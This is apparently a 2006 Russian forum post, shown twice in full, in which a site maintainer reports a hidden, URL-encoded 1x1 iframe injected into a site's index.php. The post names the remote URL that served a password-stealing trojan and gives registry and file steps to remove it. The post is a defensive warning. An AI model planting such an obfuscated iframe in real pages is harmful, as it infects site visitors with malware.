tjroot
25.11.2006, 01:46
Посвящается модераторам, администраторам сайтов, серверов….
Дело было так, пришел я, значит, сегодня домой и решил посмотреть на статистику и
Страницы сайтов, которые поддерживает наша группа разработчиков (CSD group – http://www.csd.programming-security.ru (http://www.csd.programming-security.ru/)) и на одном из сайтов во время загрузки перед открытием страницы зафиксировал подгрузку интересного фрейма (сайт про который идет речь – http://tvh-aliance.ru (http://tvh-aliance.ru/) , - код уже исправлен) с забугорного сайта, Каспер – надо отдать ему должное сразу же начал материться, и распознал в открываемом фрейме- не ладное, а именно вирусное ПО (благодарности Крису). После этого инцидента проверил исходные коды страниц, скриптов, что оказалось (внимание админов и модераторов!) на заглавной странице- index.php сразу же после тега <html> перед тегом <head> имелся интересный HTML код вида:
<iframe src="http://%61%6c%65%72%74%2d%63%61.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe>
Этот милый фрейм загружал на компьютер посетителей сайта следующий файл:
http://53server.com/counter1/load.xxx (http://53server.com/counter1/load.xxx) - как видите адрес указан в строке….
(Админы и модераторы, проверьте, пожалуйста, все заглавные страницы на своих серверах, дабы не дать трояну распространяться по Всей сети….!)
А далее я отрубил Каспера (чтобы не мешал) загрузил вирус на компьютер и начал изучать…. Оказалось что он скрывается используя функции режима ядра, прописывает себя в реестре откуда и грузится на компьютер добропорядочный пользователей, подворовывает пароли… Дальше исследовать я его не стал… Нету времени, а удалить можно так:
Сначала в реестре в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
ищем ключ port windows, удаляем его вместе с содержимым
после этого перезагружаемся (в обычном режиме)
Троян уже не загружен! Открываем %SystemDir% находим файло ogysteo.exe
И удаляем его руками…. Учтите куски кода останутся на машине в виде драйвера режима ядра и вирусной dll, но они будут бесполезны, я этого не стал изучать, нет времени. Если у кого будет время его поизучать вышлите пожалуйста наработки, вплоть до сырых дезассемблировок. Можем вместе повеселиться над телом несчастного вируса…..
P.S. Каспер его классифицирует как Trojan-Dropper.Win32.Agent.ays,
если выше перечисленные манипуляции не помогли и Троянов много, значит у Вас сидит Trojan.Downloader, который качает к Вам всякую нечисть в том числе и разобранный нами Троянский вирус, для излечения нужны более экзотические меры как то составление отчета о системе и отсылка его мне, вместе проанализируем, скажу что удалить, может Вы мне вышлите найденные образцы – я их обычно изучаю и пишу противоядие….
Скоро выйдет утилита для излечения от ogysteo…
Да чуть не забыл, а постоянно грузится он к Вам, даже после удаления, потому что оставляет свой "дистрибутив" в папке Temp для Вашей учетной записи пользователя, на этот дистрибутив как раз и указывает выше названный ключ в реестре.......
Напишите в форум или вышлите на мыло название вирусного ключа в Вашем реестре, даже если ключ отличается от того что я указал Выше -
port windows, то просто откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
- это автоматически запускаемые программы, и внимательно взгляните на ключи со значениями подобными этому:
C:\Documents and Settings\%Название Вашей учетной записи%\Local Settings\Temp\%название вирусного "дистрибутива" - ключей загружаемых данные из папки Documents and Settings, не бывает априоре, если он есть то скорее всего его оставил для себя Троян, тем более из временной папки Temp....
Жду Ваших ответов...
С уважением к обитателям форума Сергей aka tjroot [email protected] ([email protected])
Дело было так, пришел я, значит, сегодня домой и решил посмотреть на статистику и
Страницы сайтов, которые поддерживает наша группа разработчиков (CSD group – http://www.csd.programming-security.ru (http://www.csd.programming-security.ru/)) и на одном из сайтов во время загрузки перед открытием страницы зафиксировал подгрузку интересного фрейма (сайт про который идет речь – http://tvh-aliance.ru (http://tvh-aliance.ru/) , - код уже исправлен) с забугорного сайта, Каспер – надо отдать ему должное сразу же начал материться, и распознал в открываемом фрейме- не ладное, а именно вирусное ПО (благодарности Крису). После этого инцидента проверил исходные коды страниц, скриптов, что оказалось (внимание админов и модераторов!) на заглавной странице- index.php сразу же после тега <html> перед тегом <head> имелся интересный HTML код вида:
<iframe src="http://%61%6c%65%72%74%2d%63%61.%63%6f%6d/%63%6f%75%6e%74%65%72%31/%69%6e%64%65%78.%70%68%70" width=1 height=1></iframe>
Этот милый фрейм загружал на компьютер посетителей сайта следующий файл:
http://53server.com/counter1/load.xxx (http://53server.com/counter1/load.xxx) - как видите адрес указан в строке….
(Админы и модераторы, проверьте, пожалуйста, все заглавные страницы на своих серверах, дабы не дать трояну распространяться по Всей сети….!)
А далее я отрубил Каспера (чтобы не мешал) загрузил вирус на компьютер и начал изучать…. Оказалось что он скрывается используя функции режима ядра, прописывает себя в реестре откуда и грузится на компьютер добропорядочный пользователей, подворовывает пароли… Дальше исследовать я его не стал… Нету времени, а удалить можно так:
Сначала в реестре в разделе HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
ищем ключ port windows, удаляем его вместе с содержимым
после этого перезагружаемся (в обычном режиме)
Троян уже не загружен! Открываем %SystemDir% находим файло ogysteo.exe
И удаляем его руками…. Учтите куски кода останутся на машине в виде драйвера режима ядра и вирусной dll, но они будут бесполезны, я этого не стал изучать, нет времени. Если у кого будет время его поизучать вышлите пожалуйста наработки, вплоть до сырых дезассемблировок. Можем вместе повеселиться над телом несчастного вируса…..
P.S. Каспер его классифицирует как Trojan-Dropper.Win32.Agent.ays,
если выше перечисленные манипуляции не помогли и Троянов много, значит у Вас сидит Trojan.Downloader, который качает к Вам всякую нечисть в том числе и разобранный нами Троянский вирус, для излечения нужны более экзотические меры как то составление отчета о системе и отсылка его мне, вместе проанализируем, скажу что удалить, может Вы мне вышлите найденные образцы – я их обычно изучаю и пишу противоядие….
Скоро выйдет утилита для излечения от ogysteo…
Да чуть не забыл, а постоянно грузится он к Вам, даже после удаления, потому что оставляет свой "дистрибутив" в папке Temp для Вашей учетной записи пользователя, на этот дистрибутив как раз и указывает выше названный ключ в реестре.......
Напишите в форум или вышлите на мыло название вирусного ключа в Вашем реестре, даже если ключ отличается от того что я указал Выше -
port windows, то просто откройте раздел реестра HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\
- это автоматически запускаемые программы, и внимательно взгляните на ключи со значениями подобными этому:
C:\Documents and Settings\%Название Вашей учетной записи%\Local Settings\Temp\%название вирусного "дистрибутива" - ключей загружаемых данные из папки Documents and Settings, не бывает априоре, если он есть то скорее всего его оставил для себя Троян, тем более из временной папки Temp....
Жду Ваших ответов...
С уважением к обитателям форума Сергей aka tjroot [email protected] ([email protected])